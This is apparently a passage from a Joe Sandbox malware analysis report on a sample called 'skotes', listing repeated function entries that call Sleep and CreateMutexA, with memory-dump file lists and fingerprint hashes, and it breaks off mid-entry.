Instruction Fuzzy Hash: C4312A317042059BEB08DB7CDD897AEB7B6EBD7324F248218E058973D6C7768981CB91

Function 009A9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 946ae94a65f58c5b89745f407ef21e2754e9ece8bdb1ded5fb6d9ccc0f80f297
Instruction ID: 2e8ebe4017818aad940e06dbeae96eacd0fa872b331ad6c74720b56d4fd8a56a
Opcode Fuzzy Hash: 946ae94a65f58c5b89745f407ef21e2754e9ece8bdb1ded5fb6d9ccc0f80f297
Instruction Fuzzy Hash: 923148317002058BEB18DB7CDD887ADB766EBCB310F208618E018EB2D5D7768981CB92

Function 009AA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e83423e4373600a64d5a22e91ecbc6a2bdb4fb8d3445bb7eebbcd98e717368f2
Instruction ID: 5f8ac7db76ad85912a2f193c20baa9ed52d30c5d403200705135ae4386301adf
Opcode Fuzzy Hash: e83423e4373600a64d5a22e91ecbc6a2bdb4fb8d3445bb7eebbcd98e717368f2
Instruction Fuzzy Hash: 9A3148317042059BEB08DB7CCD89BADB776DBCB314F208219E018973D1C7769981CB92

Function 009AA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 08d03c3fe622d5a132c3ec4e009bb6b0a3f54e0b87a25ea33e7c5e0163a8c80e
Instruction ID: e562244d1bba76d8d63ba7221ab0baf3846b5b2c82b38ccdfc528b13ada7334f
Opcode Fuzzy Hash: 08d03c3fe622d5a132c3ec4e009bb6b0a3f54e0b87a25ea33e7c5e0163a8c80e
Instruction Fuzzy Hash: AC3128317042059BEB18DBBCDD8D7ADB776ABCB310F204219E414972D1D77A9981CB92

Function 009AA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f9a4238388afdcd295ed6f8dfa5c33007bceb59d68497a6075bc3a2cab3237b0
Instruction ID: cc11d9ce40b15d81cc3414118e5a2bf0f4440200654bec5a38714bed89a968ec
Opcode Fuzzy Hash: f9a4238388afdcd295ed6f8dfa5c33007bceb59d68497a6075bc3a2cab3237b0
Instruction Fuzzy Hash: 63312931B002059BEB089BBCDD8D7ADB7B5EFDA314F208219E054973E5D7764980CAA2

Function 009AA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 7e81c859301397c17bed5b60ddadda75184b7149de8bef999c826789e57a911e
Instruction ID: 40eed2bcfd23b09c9b10af4fe7ab585838a69ad9f62a13f25003041e61a65128
Opcode Fuzzy Hash: 7e81c859301397c17bed5b60ddadda75184b7149de8bef999c826789e57a911e
Instruction Fuzzy Hash: DB313B31B012058BEB18DBBCDD897ADB776EFCA324F248618E054973D1C7768981CB96

Function 009AA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

